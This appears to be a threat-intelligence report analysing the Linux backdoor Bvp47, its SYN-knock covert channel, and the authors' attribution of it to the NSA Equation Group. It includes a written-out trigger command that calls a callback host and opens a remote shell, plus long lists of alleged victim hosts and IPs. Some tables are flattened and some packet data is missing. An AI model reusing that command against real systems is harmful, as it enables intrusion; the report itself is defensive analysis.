## Bvp47 ### Top-tier Backdoor of US NSA Equation Group ###### Technical Details ----- # Content Table **1. Executive Summary** **2. Unseen Backdoor** **3. Backdoor Overview – Bvp47** File Structure File Properties File Structure Usage Scenario **4. Attacker Correlation and Attribution** “The Shadow Brokers Leaks” Incident Correlation Asymmetric Algorithm Private Key Match Samples In-depth Correlation Full Control Command Line Connection with Snowden Incident Bvp47—US NSA’ s Top-tier Backdoor 1 2 4 4 4 4 6 8 8 9 9 12 13 15 **5. Global Victims** Connection with Snowden Incident Exploit the victim host as a jump server to attack target **6. Detailed Techniques of Bvp47 Backdoor** Major Behaviours Payload Strings Encryption Techniques of Function Name Obfuscation Bvp Engine System Hook AV Evasion in Kernel Module BPF Covert Channel Channel Encryption and Decryption Runtime Environment Detection Other Techniques **16** 16 26 **27** 27 28 31 32 33 38 45 45 48 50 51 **7. Summary** **52** **8. References** **53** ----- ### 1. Executive Summary In a certain month of 2013, during an in-depth forensic investigation of a host in a key domestic department, researchers from the Pangu Lab extracted a set of advanced backdoors on the Linux platform, which used advanced covert channel behavior based on TCP SYN packets, code obfuscation, system hiding, and self-destruction design. In case of failure to fully decrypt, It is further found that this backdoor needs the check code bound to the host to run normally. Then the researchers cracked the check code and successfully ran the backdoor. Judging from some behavioral functions, this is a top-tier APT backdoor, but further investigation requires the attacker's asymmetric encrypted private key to activate the remote control function. Based on the most common string "Bvp" in the sample and the numerical value 0x47 used in the encryption algorithm, the team named the corresponding malicious code "Bvp47" at the time. In 2016 and 2017, “The Shadow Brokers” published two batches of hacking files claimed to be used by “The Equation Group”. In these hacking files, researchers form Pangu Lab found the private key that can be used to remotely trigger the backdoor Bvp47. Therefor, It can be concluded that Bvp47 is a hacker tool belonging to " The Equation Group". Through further research, the researchers found that the multiple procedures and attack operation manuals disclosed by "The Shadow Broker" are completely consistent with the only identifier used in the NSA network attack platform operation manual [References 3 and 4] exposed by CIA analyst Snowden in the "Prism" incident in 2013. In view of the US government's prosecution of Snowden on three charges of "spreading national defense information without permission and deliberately spreading confidential information", it can be determined that the documents published by "The Shadow Brokers" are indeed NSA, which can fully prove that ” The Equation Group” belongs to NSA, that is, Bvp47 is the top-tier backdoor of NSA. Besides the files of “The Shadow Brokers” revealed that the scope of victims exceeded 287 targets in 45 countries, including Russia, Japan, Spain, Germany, Italy, etc. The attack lasted for over 10 years. Moreover, one victim in Japan is used as a jump server for further attack. Pangu Lab has a code named “Operation Telescreen” for several Bvp47 incidents. Telescreen is a device imagined by British writer George Orwell in his novel “1984”. It can be used to remotely monitor the person or organization deploying the telescreen, and the "thought police" can arbitrarily monitor the information and behavior of any telescreen. The Equation Group is the world's leading cyber-attack group and is generally believed to be affiliated with the National Security Agency of the United States. Judging from the attack tools related to the organization, including Bvp47, Equation group is indeed a first-class hacking group. The tool is well-designed, powerful, and widely adapted. Its network attack capability equipped by 0day vulnerabilities was unstoppable, and its data acquisition under covert control was with little effort. The Equation Group is in a dominant position in national-level cyberspace confrontation. ----- ### 2. Unseen Backdoor In a certain month of 2015, an advanced threat detection system deployed by a customer prompted a special network intrusion alarm, and there were suspicious communication activities between important servers. During the incident response process, packets were captured at several nodes in the network and the server’s information was obtained by disk mirroring. After preliminary analysis, at least two servers in the system network have been hacked and implanted with backdoors, and there are signs of a relatively large amount of data leakage The investigation of the incident involved 3 servers, one of which was the source of external attacks, host A, and the other two internally affected servers, V1 (mail server) and V2 (a business server). There is abnormal communication between external host A and the V1 server. Specifically, A first sends a SYN packet with a 264-byte payload to port 80 of the V1 server (normal SYN packets generally do not carry a Payload), and then the V1 server immediately initiates an external connection to the high-end port of the A machine and maintains a large amount of exchange data. Data communication is encrypted. At almost the same time, the V1 server connects to the V2 server's SMB service and performs some sensitive operations, including logging in to the V2 server with an administrator account, trying to open terminal services, enumerating directories, and executing Powershell scripts through scheduled tasks. At the same time, the V2 server connected to the 8081 port of the V1 server to download suspicious files, including the Powershell script and the encrypted data of the second stage. A simple HTTP server implemented in Python was started on port 8081 of the V1 server, and the V2 server obtained two files from the above: index.html and index.htm. Among them, index.html is a Base64-encoded Powershell script. After this script is executed on the server, it will continue to download a file named index.htm from the V1 server. The content is Base64-encoded data, but after decoding it is found to be an unreadable string. Analysis of the Powershell script executed to download index.htm proves that this is a piece of asymmetrically encrypted data. Next, the V2 server connects to the high-end port of the V1 server to communicate with its own protocol, and a large amount of interactive transmission data is encrypted. ----- Based on the above observations, it can be inferred from the above analysis that the V1/V2 servers have been implanted with backdoors. By integrating the overall interaction of the A machine and the V1/V2 server, we can restore the communication process between the machines as follows: 1. Machine A connects to port 80 of the V1 server to send a knock request and start the backdoor program on the V1 server; 2. The V1 server reversely connects the high-end port of machine A to establish a data pipeline; 3. The V2 server connects to the backdoor web service opened on the V1 server, and obtains PowerShell execution from the V1 server; 4. The V1 server connects to the SMB service port of the V2 server to perform command operations; 5. The V2 server establishes a connection with the V1 server on the high-end port and uses its own encryp tion protocol for data exchange; 6. The V1 server synchronizes data interaction with the A machine, and the V1 server acts as a data trans fer between the A machine and the V2 server; This is a backdoor communication technology that has never been seen before, implying an organization with strong technical capabilities behind it. ----- ### 3. Backdoor Overview – Bvp47 After some effort, our forensic team successfully extracted the backdoor file on the compromised machine and found that the string "Bvp" is more common in the sample file and the value 0x47 is used in the encryption algorithm. We will temporarily name the sample file " Bvp47". ###### File Structure File Properties Filename initserial or others Hash(MD5) 58b6696496450f254b1423ea018716dc File Size 299,148 bytes File Path /usr/bin/modload Platform Linux File Structure ELF Payload The basic file structure of Bvp47 includes two parts: loader and payload. The loader is mainly responsible for the decryption and memory loading of the payload. The payload is compressed and encrypted. The 18 slices are simply divided into three types T0, T1, T2, named Slice0x00-Slice0x11: - T0{Slice0x00} - T1{Slice0x01-Slice0x10} - T2{Slice0x11} After decompression analysis, the sizes of the 18 slices of Bvp47 are as follows: |Filename|initserial or others| |---|---| |Hash(MD5)|58b6696496450f254b1423ea018716dc| |File Size|299,148 bytes| |File Path|/usr/bin/modload| |Platform|Linux| ----- The 18 slices are sorted according to the amount of Bvp engine API calls used by each slice (for the introduction of Bvp engine, see following chapters) and the amount of export functions, the details are as follows (the red part is modules that need to be focused on): Slice Main Feature Bvp API Call Export Function Comments 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 0x0A 0x0B 0x0C 0x0D 0x0E 0x0F 0x10 0x11 Detect runtime environment Non-PE module, Bvp offset database Dewdrops SectionChar_Agent Non-PE module, Bvp offset database PATh=. crond 0 192 8 9 2 3 10 10 3 8 0 0 0 15 0 17 0 190 490 5 14 3 16 152 264 17 3 14 0 0 0 0 94 0 1 init function module_main module_main module_main ----- ###### Usage Scenario Our team reproduced the use of the Bvp47 backdoor in our own environment and roughly clarified its usage scenarios and basic communication mechanisms. As an important backdoor platform for long-term control of victims after a successful invasion, Bvp47 generally lives in the Linux operating system in the demilitarized zone that communicates with the Internet. It mainly assumes the core control bridge communication role in the overall attack, as shown in the following figure: ###### Attacker(SYN Knock) **Hacker** ###### Internet(e.g. 443port) GateWay Router/Firewall TCP Lateral movement Internal Server DMZ Email server etc. After analysis, the actual network attack data packet process was restored. ----- ###### p p 1. Once the control end (192.168.91.131) sends a TCP protocol SYN packet with a certain length of a specific payload (length is 136 bytes) to the "victim IP" (192.168.91.128); 1357 port (the live port can be reused directly); 2. After receiving the special SYN packet, the "victim IP" (192.168.91.128) will immediately follow the instructions to connect to port 2468 of the "control end"; 3. The "victim IP" (192.168.91.128) enters the controlled process; Bvp47 exploits one weakness that common network detection devices generally do not check data packets during the TCP handshake. Bvp47 injects data in the first SYN packet in order to avoid detection by network security devices. [Step 1] The payload data in the mentioned SYN packet is as follows: [Step 3] The content of the packet sent by the victim IP after the successful TCP handshake is as follows: In the analysis later in this article, Bvp47 builds its covert communication system from cryptography, network, and Linux OS. Such covert communication system is cutting edge and can be seen as an advanced version of "SYNKnock" (old version of Cisco devices only conduct simple verification). ----- #### 4. Attacker Correlation and Attribution ###### “The Shadow Brokers Leaks” Incident Correlation In 2016, a hacker group named Shadow Broker released two compressed files, eqgrp-free-file.tar.xz.gpg and eqgrp-auction-file.tar.xz.gpg, claiming to have compromised the United States NSA's Equation group. The compressed file contains a large number of hacking tools of Equation group. Among them, the eqgrp-free-file.tar.xz.gpg compressed file is available for public download for inspection, and the other is sold at a current price of 1 million bitcoins for the decompression password of the eqgrp-auction-file.tar.xz.gpg file. However, no one would buy it. Finally, Shadow Broker chose to publish the decompression password of eqgrp-auction-file.tar.xz.gpg in April 2017. In the process of analyzing the eqgrp-auction-file.tar.xz.gpg file, it was found that Bvp47 and the attacking tools in the compressed package were technically deterministic, mainly including “dewdrops”, “solutionchar_agents”, “tipoffs”, “StoicSurgeon”, “insision” and other directories. The “dewdrops_tipoffs” contains the private key required by Bvp47 for RSA public-private key communication. On this basis, it can be confirmed that Bvp47 is from Equation group. Among them, “dewdrops” and “solutionchar_agents” are integrated into the Bvp47 sample platform as component functions, and the “tipoffs” directory is the control end of the Bvp47 remote communication. ----- ###### Asymmetric Algorithm Private Key Match The “tipoffs” directory contains the RSA asymmetric algorithm private key used in the Bvp47 covert channel. That RSA private key is vital to Bvp47's command execution and other operations. ###### Samples In-depth Correlation The user.tool.stoicsurgeon.COMMON file in the eqgrp-auction-file.tar.xz.gpg file\Linux\doc\old\etc\ directory describes how to use the tipoff-BIN tool, and also reveals a series of Information: 1. Bvp47 contains the module named "dewdrop", which can be triggered by the RSA private key of moudle "tipoff"; 2. File COMMON descript a backdor named "StoicSurgeon", namely a stoic surgeon, a multi-platform advanced rootkit backdoor, which can be combined use with "dewdrop"; 3. "StoicSurgeon" also has a little brother, "Incision", which is an incision and a rootkit backdoor; 4. During invasion, "Incision" can be upgraded to "StoicSurgeon"; ----- The operating system supported by dewdrop basically covers mainstream Linux distributions, JunOS, FreeBSD, Solaris, etc. The operating system supported by StoicSurgeon basically covers mainstream Linux distributions,JUNOS,FreeBSD,Solaris,etc. ----- How to upgrade from Incision to Stoicsurgeon is provided in the file "user.tool.linux.remove_install_ss.COMMON". ----- ###### Full Control Command Line Bounce back connection operation of Bvp47 backdoor can be done by following command: ###### #./tipoffs/dewdrop_tipoff --trigger-address 11.22.33.44 --target-address 12.34.56.78 --target-protocol tcp --target-port 1357 --callback-address 13.24.57.68 --callback-port 2468 --start-ish Among them, ish corresponds to the file ish in the \eqgrp-auction-file\Linux\bin directory, combined with the leaked ish tool, successfully activated the backdoor Bvp47, completed the remote download execution function, and opened the remote shell. ----- ###### Connection with Snowden Incident In December 2013, the German media "Der Spiegel" published an NSA ANT catalog with 50 pictures. This is a series of top-secret materials compiled by the NSA in 2008-2009, including the use of a series of advanced hacking tools. The source of information may come from Edward Snowden or another unknown intelligence provider [Reference 3]. The FOXACID-Server-SOP-Redacted.pdf file in the NSA ANT catalog [Reference 4], that is, the "Acid Fox" Project-Server Standard Operating Procedure Revision, NSA Vulnerability Attack Operating Platform Functional Description and User Manual, in this standard work. The document describes the mandatory unique identification code required for the job, "ace02468bdf13579". ----- \eqgrp-free-file\Firewall\BANANAGLEE\BG3000\Install\LP\Modules\PIX\ directory, also has a unique identification code of "ace02468bdf13579", and the file name “SecondDate” conforms to the standard of operation document. If SecondDate-3021.exe is just a coincidence, string "ace02468bdf13579" appears in the 47 files related to the tool named SecondDate in the leaked tool set, which is obviously not a coincidence that can be explained. And in a SecondDate file named \eqgrp-free-file\Firewall\SCRIPTS\ directory, it describes how to use SecenData, which is consistent with the description of FOXACID-Server-SOP-Redacted.pdf mentioned earlier. ----- spans multiple platforms and architectures, such as Windows, Linux, Solaris, etc. The types from executable files to shellcode are very comprehensive, and it has undergone multiple iterations of the lowest version. 1.3.0.1 was created in May 2007, and the highest version 3.0.3.6 was created in October 2013. The starting time was in line with the top-secret electronic monitoring plan implemented in 2007 as described by the PRISM Project (PRISM), and it lasted as long as 6 years. The iterative version, perfect cross-platform, support for various architectures, and diversified startup methods imply the strong organizational and technical capabilities behind the project. Moreover, the relationship between STOICSURGEON and the SECONDDATE program is also clarified in the opscript.txt in the "EquationGroup-master\Linux\etc" directory: Therefore, there are enough reasons to believe that the two compressed files leaked by Shadow Brokers in 2016 and 2017 belonged to the NSA Equation group’s hacking tools. ###### Bvp47—US NSA’s Top-tier Backdoor 1. The unique feature identifier "ace02468bdf13579" in the hacker tool mentioned in the material of the NSA ANT catalog FOXACID-Server-SOP-Redacted.pdf has appeared in the tool set of "The Shadow Brokers Leaks" many times; 2. The RSA private key in the Bvp47 backdoor program exists in the tool tipoff-BIN of "The Shadow Brokers Leaks"; 3. Use the tool tipoff-BIN of "The Shadow Brokers Leaks" to directly activate the moule Dewdrops of the backdoor Bvp47, and Dewdrop and STOICSURGEON were belong to the same series backdoor ; 4. It is finally determined that the Bvp47 backdoor is assembled by the "The Shadow Brokers Leaks" tool module, that is, Bvp47 belongs to the top backdoor of the Equation group of US NSA; ----- #### 5. Global Victims ###### The victims in 2017 Shadow Brokers leak A list of potential Dewdrop, StoicSurgeon and Incision backdoor victims is provided in the eqgrp-auction-file.tar.xz.gpg file\Linux\bin\varkeys\pitchimpair\ directory. The victims are all over the world, including some key units of China: |Domain name sonatns.sonatrach.dz enterprise.telesat.com.co voyager1.telesat.com.co metcoc5cm.clarent.com iti-idsc.net.eg mbox.com.eg pksweb.austria.eu.net opserver01.iti.net.pk sussi.cressoft.com.pk ns1.multi.net.pk mpkhi-bk.multi.net.pk tx.micro.net.pk|IP 193.194.75.35 66.128.32.67 66.128.32.68 213.132.50.10 163.121.12.2 213.212.208.10 193.154.165.79 202.125.138.184 202.125.140.194 202.141.224.34 202.141.224.40 203.135.2.194|Country Algeria Argentina Argentina Argentina Egypt Egypt Austria Pakistan Pakistan Pakistan Pakistan Pakistan|Details Algeria North America North America United Arab Emirates DU Telecom Egypt Egypt Austria Pakistan Pakistan Pakistan Pakistan Pakistan| |---|---|---|---| ----- |pop.net21pk.com connection1.connection.com.br connection2.connection.com.br vnet3.vub.ac.be debby.vub.ac.be theta.uoks.uj.edu.pl rabbit.uj.edu.pl okapi.ict.pwr.wroc.pl ids2.int.ids.pl most.cob.net.ba webnetra.entelnet.bo ns1.btc.bw mailhost.fh-muenchen.de sunbath.rrze.uni--erlangen.de niveau.math.uni-bremen.de s03.informatik.uni-bremin.de kalliope.rz.unibw--muenchen.de kommsrv.rz.unibw-muenchen.de servercip92.e-technik.uni-rostock.de paula.e-technik.uni-rostock.de pastow.e-technik.uni-rostock.de xilinx.e-technik.uni-rostock.de asic.e-technik.uni-rostock.de jupiter.mni.fh.giessen.de saturn.mni.fh-giessen.de n02.unternehmen.com no1.unternehemen.com no3.unternehmen.org unk.vver.kiae.rr sunhe.jinr.ru mail.ioc.ac.ru www.nursat.kz kserv.krldysh.ru ns2.rosprint.ru gate.technopolis.kirov.ru jur.unn.ac.ru|203.135.45.66 200.160.208.4 200.160.208.8 134.184.15.13 134.184.15.79 149.156.89.30 149.156.89.33 156.17.42.30 195.117.3.32 195.222.48.5 166.114.10.28 168.167.168.34 129.187.244.204 131.188.3.200 134.102.124.201 134.102.201.53 137.193.10.12 137.193.10.8 139.30.200.132 139.30.200.225 139.30.200.36 139.30.202.12 139.30.202.8 212.201.7.17 212.201.7.21 62.116.144.147 62.116.144.150 62.116.144.190 144.206.175.2 159.93.18.100 193.233.3.6 194.226.128.26 194.226.57.53 194.84.23.125 217.9.148.61 62.76.114.22|Pakistan Brazil Brazil Belgium Belgium Poland Poland Poland Poland Bosnia Bolivia Botswana Germany Germany Germany Germany Germany Germany Germany Germany Germany Germany Germany Germany Germany Germany Germany Germany The Russian Federation The Russian Federation The Russian Federation The Russian Federation The Russian Federation The Russian Federation The Russian Federation The Russian Federation|Pakistan Brazil Sao Paulo Brazil Sao Paulo Free University of Brussels, Belgium Free University of Brussels, Belgium Poland academic centre in Southern Poland Poland academic centre in Southern Poland Poland Education Network Poland Bosnia and Herzegovina Bolivia Botswana eibniz Rechenzentrum, Munich, Bavaria, Germany University of Erlangen-Nuremberg, Germany University of Bremen, Germany University of Bremen, Germany Bundeswehr University Munich, Germany Bundeswehr University Munich, Germany Germany Germany Germany Germany Germany Giessen-Friedberg University of Applied Sciences, Germany Giessen-Friedberg University of Applied Sciences, Germany InterNetX, Munich, Bavaria, Germany InterNetX, Munich, Bavaria, Germany InterNetX, Munich, Bavaria, Germany Kurchatov Institute of Atomic Energy, Russia Dubna University, Russia Russia Russia Russia Russia Russia Russia| |---|---|---|---| ----- |ns1.bttc.ru spirit.das2.ru m0-s.san.ru tayuman.info.com.ph ns2-backup.tpo.fi mail.tpo.fi ns.youngdong.ac.kr ns1.youngdong.ac.kr ns.kix.ne.kr ns.khmc.or.kr ns.hanseo.ac.kr mail.hanseo.ac.kr sky.kies.co.kr smuc.smuc.ac.kr ns.anseo.dankook.ac.kr myhome.elim.net ns.kimm.re.kr mail.howon.ac.kr ns.hufs.ac.kr san.hufs.ac.kr ns.icu.ac.kr winner.hallym.ac.kr ns.hallym.ac.kr winners.yonsei.ac.kr e3000.hallym.ac.kr win.hallym.ac.kr mail.hallym.ac.kr dcproxy1.thrunet.com mail.mae.co.kr ns2.ans.co.kr ns.eyes.co.kr ftp.hyunwoo.co.kr jumi.hyunwoo.co.kr mail.utc21.co.kr doors.co.kr orange.npix.net|80.82.162.118 81.94.47.83 88.147.128.28 203.172.11.21 193.185.60.40 193.185.60.42 202.30.58.1 202.30.58.5 202.30.94.10 203.231.128.1 203.234.72.1 203.234.72.4 203.236.114.1 203.237.176.1 203.237.216.2 203.239.130.7 203.241.84.10 203.246.64.14 203.253.64.1 203.253.64.2 210.107.128.31 210.115.225.10 210.115.225.11 210.115.225.14 210.115.225.16 210.115.225.17 210.115.225.25 210.117.65.44 210.118.179.1 210.126.104.74 210.98.224.88 211.232.97.195 211.232.97.217 211.40.103.194 211.43.193.9 211.43.194.48|The Russian Federation The Russian Federation The Russian Federation Philippine Finland Finland South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea|Russia Russia Russia Philippine Finland Finland South Korea South Korea South Korea National Infomation Society Agency South Korea KYUNG-HEE UNIVERSITY South Korea KT Telecom South Korea KT Telecom South Korea South Korea Education Network South Korea Education Network South Korea South Korea KOREA INSTITUTE OF MACHINERY & MATERIALS South Korea Education Network South Korea Hankuk University of Foreign Studies South Korea Hankuk University of Foreign Studies Sejong University, South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea South Korea Cheongju, South Korea South Korea South Korea South Korea South Korea LG DACOM South Korea South Korea| |---|---|---|---| ----- |seoildsp.co.kr logos.uba.uva.nl opcwdns.opcw.nl nl37.yourname.nl ns.gabontelecom.com itellin1.eafix.net ns1.starnets.ro ns2.chem.tohoku.ac.jp ns.global-one.dk eol1.egyptonline.com rayo.pereira.multi.net.co mn.mn.co.cu smtp.bangla.net ns1.bangla.net mail.bangla.net dns2.unam.mx dns1.unam.mx ns.unam.mx sedesol.sedesol.gob.mx www.pue.uia.mx docs.ccs.net.mx info.ccs.net.mx segob.gob.mx mercurio.rtn.net.mx mercurio.rtn.net.mx ciidet.rtn.net.mx tuapewa.polytechnic.edu.na sunfirev250.cancilleria.gob.ni ccmman.rz.unibw--muenchen.de unknown.unknown www21.counsellor.gov.cn mbi3.kuicr.kyoto-u.ac.jp cs-serv02.meiji.ac.jp icrsun.kuicr.kyoto-u.ac.jp icrsun.kuicr.kyoto-u.ac.jp sunl.scl.kyoto-u.ac.jp|218.36.28.250 145.18.84.96 195.193.177.150 82.192.68.37 217.77.71.52 212.49.95.133 193.226.61.68 130.134.115.132 194.234.33.5 206.48.31.2 206.49.164.2 216.72.24.114 203.188.252.10 203.188.252.2 203.188.252.3 132.248.10.2 132.248.204.1 132.248.253.1 148.233.6.164 192.100.196.7 200.36.53.150 200.36.53.160 200.38.166.2 204.153.24.1 204.153.24.14 204.153.24.32 196.31.225.2 165.98.181.5 137.93.10.6 125.10.31.145 130.34.115.132 133.103.101.21 133.26.135.224 133.3.5.2 133.3.5.20 133.3.5.30|South Korea Netherlands Netherlands Netherlands Gabon Kenya Romania USA USA USA USA USA Bangladesh Bangladesh Bangladesh Mexico Mexico Mexico Mexico Mexico Mexico Mexico Mexico Mexico Mexico Mexico South Africa Nicaragua Norway Japan Japan Japan Japan Japan Japan Japan|South Korea Netherlands Netherlands LeaseWeb IDC, Amsterdam, The Netherlands Gabon Kenya Romania USA Denmark USA USA USA Bangladesh Bangladesh Bangladesh National Autonomous University of Mexico National Autonomous University of Mexico National Autonomous University of Mexico Mexico Mexico Mexico Mexico Mexico Mexico Mexico Mexico Namibia National Engineering University of Nicaragua Norway Japan ATHOME Network Tohoku University Japan Meiji University, Japan Kyoto University, Japan Kyoto University, Japan Kyoto University, Japan| |---|---|---|---| ----- |uji.kyoyo-u.ac.jp ci970000.sut.ac.jp ns.bur.hiroshima-u.ac.jp fl.sun-ip.or.jp son-goki.sun-ip.or.jp nodep.sun-ip.or.jp hk.sun-ip.or.jp ns1.sun-ip.or.jp proxy1.tcn.ed.jp photon.sci-museum.kita.osaka.jp noc35.corp.home.ad.jp noc37.corp.home.ad.jp noc38.corp.home.ad.jp noc33.corp.home.ad.jp noc21.corp.home.ad.jp noc23.corp.home.ad.jp noc25.corp.home.ad.jp noc26.corp.home.ad.jp www2.din.or.jp www3.din.or.jp mail-gw.jbic.go.jp mail.interq.or.jp www.cfd.or.jp hakuba.janis.or.jp mx1.freemail.ne.jp pitepalt.stacken.kth.se snacks.stacken.kth.se ns.stacken.kth.se milko.stacken.kth.se xn--selma-lagerlf-tmb.stacken.kth.se xn--anna-ahlstrm-fjb.stacken.kth.se www.bygden.nu geosun1.unige.ch scsun25.unige.ch cmusun8.unige.ch dns2.net1.it|133.3.5.33 133.31.106.46 133.41.145.11 150.27.1.10 150.27.1.11 150.27.1.2 150.27.1.5 150.27.1.8 202.231.176.242 202.243.222.7 203.165.5.114 203.165.5.117 203.165.5.118 203.165.5.74 203.165.5.78 203.165.5.80 203.165.5.82 203.165.5.83 210.135.90.7 210.135.90.8 210.155.61.54 210.157.0.87 210.198.16.75 210.232.42.3 210.235.164.21 130.237.234.151 130.237.234.152 130.237.234.17 130.237.234.3 130.237.234.51 130.237.234.53 192.176.10.178 129.194.41.4 129.194.49.47 129.194.97.8 213.140.195.7|Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan Sweden Sweden Sweden Sweden Sweden Sweden Sweden Switzerland Switzerland Switzerland Cyprus|Kyoto University, Japan Tokyo University of Science Japan Japan Japan Japan Japan Japan Japan SINET Tokyo Velix Technology Co., Ltd. Japan Japan Japan Japan Japan Japan Japan Japan Japan Japan KDDI Communications Company, Tokyo, Japan Japan GMO Japan Japan KDDI Japan KDDI Sweden Sweden Sweden Sweden Sweden Sweden Sweden University of Geneva, Switzerland University of Geneva, Switzerland University of Geneva, Switzerland Cyprus| |---|---|---|---| ----- |sparc.nour.net.sa mail.imamu.edu.sa kacstserv.kacst.edu.sa mail.jccs.com.sa sci.s-t.au.ac.th webmail.s-t.au.ac.th mail.howon.ac.kr nsce1.ji-net.com war.rkts.com.tr orion.platino.gov.ve ltv.com.ve msgstore2.pldtprv.net splash-atm.upc.es servidor2.upc.es dukas.upc.es moneo.upc.es sun.bq.ub.es oiz.sarenet.es anie.sarenet.es orhi.sarenet.es iconoce1.sarenet.es tologorri.grupocorreo.es zanburu.grupocorreo.es ganeran.sarenet.es colpisaweb.sarenet.es burgoa.sarenet.es mtrader2.grupocorreo.es mailgw.idom.es ns2.otenet.gr electra.otenet.gr dragon.unideb.hu laleh.itrc.ac.ir. mailhub.minaffet.gov.rw mail.irtemp.na.cnr.it mail.univaq.it|212.12.160.26 212.138.48.8 212.26.44.132 212.70.32.100 168.120.9.1 168.120.9.2 203.146.64.14 203.147.62.229 195.142.144.125 161.196.215.67 200.75.112.26 192.168.120.3 147.83.2.116 147.83.2.3 147.83.2.62 147.83.2.91 161.116.154.1 192.148.167.17 192.148.167.2 192.148.167.5 194.30.0.16 194.30.32.109 194.30.32.113 194.30.32.177 194.30.32.229 194.30.32.242 194.30.32.29 194.30.33.29 195.170.2.1 195.170.2.3 193.6.138.65 80.191.2.2 62.56.174.152 140.164.20.20 192.150.195.10|Saudi Arabia Saudi Arabia Saudi Arabia Saudi Arabia Thailand Thailand Thailand Thailand Turkey Venezuela Venezuela Reserved Spain Spain Spain Spain Spain Spain Spain Spain Spain Spain Spain Spain Spain Spain Spain Spain Greece Greece Hungary Iran Israel Italy Italy|Saudi Arabia Nour Communication Co.Ltd-Nournet Saudi Arabia King Abdul Aziz City for Science and Technology Saudi Arabia King Abdul Aziz City for Science and Technology Saudi Arabia Jeraisy For Internet Services Co.Ltd Assumption University of Thailand Assumption University of Thailand Thailand Thailand Turkey Venezuela Venezuela Intranet Polytechnic University of Catalonia, Spain Polytechnic University of Catalonia, Spain Polytechnic University of Catalonia, Spain Polytechnic University of Catalonia, Spain University of Barcelona, Spain Spain Spain Spain Spain Spain Spain Spain Spain Spain Spain Spain Greece Greece Hungary Iran UK Italian National Research Council Italy| |---|---|---|---| sparc.nour.net.sa 212.12.160.26 Saudi Arabia Saudi Arabia Nour Communication Co.Ltd-Nournet Saudi Arabia King Abdul Aziz City for kacstserv.kacst.edu.sa 212.26.44.132 Saudi Arabia Science and Technology ----- |ns.univaq.it matematica.univaq.it sparc20mc.ing.unirc.it giada.ing.unirc.it mailer.ing.unirc.it mailer.ing.unirc.it bambero1.cs.tin.it gambero3.cs..tin.it mail.bhu.ac.in mtccsun.imtech.ernet.in axil.eureka.lk mu-me01-ns-ctm001.vsnl.net.in vsn1radius1.vsn1.net.in vsnl-navis.emc-sec.vsnl.net.in ns1.ias.ac.in mail.tropmet.res.in mail1.imtech.res.in nd11mx1-a-fixed.sancharnet.in ndl1pp1-a-fixed.sancharnet.in bgl1dr1-a-fixed.sancharnet.in bgl1pp1-a-fixed.sancharnet.in mum1mr1-a-fixed.sancharnet.in www.caramail.com newin.int.rtbf.be m16.kazibao.net webshared-admin.colt.net webshared-front2.colt.net webshared-front3.colt.net webshared-front4.colt.net petra.nic.gov.jo ns.cec.uchile.cl|192.150.195.20 192.150.195.38 192.167.50.12 192.167.50.14 192.167.50.2 192.167.50.202 194.243.154.57 194.243.154.62 202.141.107.15 202.141.121.198 202.21.32.1 202.54.4.39 202.54.4.61 202.54.49.70 203.197.183.66 203.199.143.2 203.90.127.22 61.0.0.46 61.0.0.71 61.1.128.17 61.1.128.71 61.1.64.45 195.68.99.20 212.35.107.2 213.41.77.50 213.41.78.10 213.41.78.12 213.41.78.13 213.41.78.14 193.188.71.4 200.9.97.3 159.226.*.* 159.226.*.* 159.226.*.*|Italy Italy Italy Italy Italy Italy Italy Italy India India India India India India India India India India India India India India UK UK UK UK UK UK UK Jordan Chile China China China|Italy Italy Italy Universita' degli Studi Mediterranea di Reggio Calabria Italy Universita' degli Studi Mediterranea di Reggio Calabria Italy Universita' degli Studi Mediterranea di Reggio Calabria Italy Universita' degli Studi Mediterranea di Reggio Calabria Italy Italy India Banaras Hindu University India Education Network Sri Lanka India India India India India India India India India India India UK Belgium UK UK UK UK UK Jordan Chile| |---|---|---|---| ----- |Col1|166.111.*.* 166.111.*.* 166.111.*.* 168.160.*.* 202.101.*.* 202.107.*.* 202.112.*.* 202.112.*.* 202.112.*.* 202.117.*.* 202.121.*.* 202.127.*.* 202.166.*.* 202.166.*.* 202.197.*.* 202.197.*.* 202.201.*.* 202.201.*.* 202.204.*.* 202.38.*.* 202.84.*.* 202.96.*.* 202.96.*.* 202.98.*.* 202.99.*.* 210.72.*.* 210.77.*.* 210.83.*.* 211.137.*.* 211.138.*.* 211.82.*.* 218.104.*.* 202.94.*.* 218.107.*.* 218.245.*.* 218.247.*.*|China China China China China China China China China China China China China China China China China China China China China China China China China China China China China China China China China China China China|Col4| |---|---|---|---| ----- |mars.ee.nctu.tw cad-server1.ee.nctu.edu.tw expos.ee.nctu.edu.tw twins.ee.nctu.edu.tw soldier.ee.nctu.edu.tw royals.ee.nctu.edu.tw mail.et.ntust.edu.tw mail.dyu.edu.tw mail.ncue.edu.tw aries.ficnet.net ns.chining.com.tw mail.tccn.edu.tw mail.must.edu.tw ultra10.nanya.edu.tw mail.hccc.gov.tw|218.29.*.* 218.29.*.* 222.22.*.* 61.151.*.* 202.175.*.* 202.175.*.* 202.175.*.* 202.175.*.* 202.175.*.* 202.175.*.* 140.113.212.13 140.113.212.150 140.113.212.20 140.113.212.26 140.113.212.31 140.113.212.9 140.118.2.53 163.23.1.73 163.23.225.100 202.145.137.19 202.39.26.50 203.64.35.108 203.68.220.40 203.68.40.6 210.241.6.97|China China China China Macau, China Macau, China Macau, China Macau, China Macau, China Macau, China Taiwan, China Taiwan, China Taiwan, China Taiwan, China Taiwan, China Taiwan, China Taiwan, China Taiwan, China Taiwan, China Taiwan, China Taiwan, China Taiwan, China Taiwan, China Taiwan, China Taiwan, China|National Chiao Tung University of Hsinchu City, Taiwan Province National Chiao Tung University of Hsinchu City, Taiwan Province National Chiao Tung University of Hsinchu City, Taiwan Province National Chiao Tung University of Hsinchu City, Taiwan Province National Chiao Tung University of Hsinchu City, Taiwan Province National Chiao Tung University of Hsinchu City, Taiwan Province National Taiwan University of Science and Technology, Taipei, Taiwan Province Taiwan Province TANet Taiwan Province TANet Taiwan Fixed Network, Taiwan Province Chunghwa Telecom, Taiwan Province Hualien County Tzu Chi University of Science and Technology, Taiwan Province Taiwan Province Taiwan Province Taiwan Province| 